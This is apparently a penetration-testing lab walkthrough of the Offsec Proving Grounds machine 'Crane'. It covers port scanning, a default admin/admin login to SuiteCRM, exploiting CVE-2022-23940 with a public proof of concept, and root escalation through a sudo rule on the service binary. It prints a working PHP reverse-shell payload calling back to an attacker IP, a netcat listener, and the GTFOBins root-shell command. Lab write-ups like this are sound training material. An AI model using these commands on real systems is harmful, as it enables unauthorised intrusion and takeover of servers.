As always in every penetration testing engagements we start by reconnaissance and information gathering, in this step we try to get as much information about the target as possible.
We can achieve that by using various of tools and techniques to obtain foothold on the target, by using enumeration, scanning and other recon techniques.
In this lab we are tasked to pentest this Linux Lab : Crane on Offsec's Proving grounds :
First step will be to check if the target is up and running, we could do so by sending ICMP requests to check if we can communicate with the target:
Next I'll perform an initial scan with rustscan to see what ports are open:
rustscan -a 192.168.113.146 - ulimit 5000From the initial scan I noticed there is 4 ports open :
Port 22 : SSH
Port 80 : HTTP
Port 3306 : mysql
Port 33060 : mysqlxFrom the full scan I can see the following output :
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:80:01:4a:43:86:30:c9:79:e7:fb:7f:3b:a4:1e:dd (RSA)
| 256 b6:18:a1:e1:98:fb:6c:c6:87:55:45:10:c6:d4:45:b9 (ECDSA)
|_ 256 ab:8f:2d:e8:a2:04:e7:b7:65:d3:fe:5e:93:1e:03:67 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: ED9A8C7810E8C9FB7035B6C3147C9A3A
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: SuiteCRM
|_Requested resource was index.php?action=Login&module=Users
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx MySQL X protocol listener
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Something that catches my attention at port 80 is the SuiteCRM, looks interesting, I'll investigate the webpage at port 80 and then move to another port afterwards…
This is the page on port 80 :
Two things to note and search for :
SuiteCRM and SugarCRM
Which are hinted in the webpage…
Apparently the website owner is lazy, because guess what? the user is admin and the password is admin…
by searching with searchsploit SuiteCRM I found an exploit for the CRM an RCE using metasploit:
SuiteCRM 7.11.18 — Remote Code Execution (RCE) (Authenticated) (Metasploit)
The metasploit exploit didn't work so I tried another exploit for the CVE:
CVE-2022–23940
This vulnerability was reported to SalesAgility and fixed in SuiteCRM 7.12.5 and SuiteCRM Core 8.0.4. In affected versions, any user with permission to create Scheduled Reports can obtain remote code execution and compromise the server. If you are using older versions of SuiteCRM, I highly advise you to update.
PoC link: https://github.com/manuelz120/CVE-2022-23940.git
By running a listener :
nc -lnvp 4444And Afterwards running the exploit with the following command I was able to get a shell:
└─# ./exploit.py -h http://192.168.113.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.218\", 4444); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
Next we should escalate our privilege to root, I would run linpeas to enumerate possible PE Vectors but before I do that I'll run sudo -l
By running Sudo -l I can see the following output :
$ sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on localhost:
(ALL) NOPASSWD: /usr/sbin/service
we can run a something called service with NOPASSWD in sudo, lets search what is this for on GTFOBINS
by running the following command I can spawn a root shell:
$ sudo /usr/sbin/service ../../bin/sh
It was this simple…